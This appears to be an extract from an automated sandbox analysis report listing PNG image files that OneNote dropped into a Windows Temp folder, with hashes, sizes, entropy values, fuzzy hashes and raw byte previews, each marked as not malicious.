                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                  C:\Users\user\AppData\Local\Temp\{9E3D7BB2-BE43-4EF0-A688-390051FF9B03}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1657
                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                  C:\Users\user\AppData\Local\Temp\{9E557843-60C8-479E-954B-2976C8C1488F}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16003
                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                  C:\Users\user\AppData\Local\Temp\{9E8F8BB7-C14E-4B05-AE75-4A6D02AA67BC}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                  C:\Users\user\AppData\Local\Temp\{9E91E7BF-77EB-4748-B34B-2B214324428E}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8184
                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                  C:\Users\user\AppData\Local\Temp\{A00EF16A-D5B7-42FC-B7B8-8322AF52AB9E}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7374
                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                  C:\Users\user\AppData\Local\Temp\{A0393063-5089-4D8E-8A8E-B035F51C1243}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8184
                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                  C:\Users\user\AppData\Local\Temp\{A1CFA596-6B39-4269-A320-0BCF161579BF}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2270
                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                  C:\Users\user\AppData\Local\Temp\{A211ABF7-3DC3-4637-8BFD-769DC720603B}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4490
                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                  C:\Users\user\AppData\Local\Temp\{A32ECC92-EA6C-4884-924F-7AF1D5F4C7B3}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2232
                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                  C:\Users\user\AppData\Local\Temp\{A34A9AB0-40E8-47F8-81CA-1824AF12A7D2}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11332
                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                  C:\Users\user\AppData\Local\Temp\{A40B5285-95CE-4235-B4A3-0E11FA44F178}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                  C:\Users\user\AppData\Local\Temp\{A5828253-25E6-4C9A-8FD7-27F5DD4B0875}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8184
                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                  C:\Users\user\AppData\Local\Temp\{A5B1B4BA-03B3-4DEE-8840-4B39C3BC4D3F}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14458
                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                  Encrypted:false
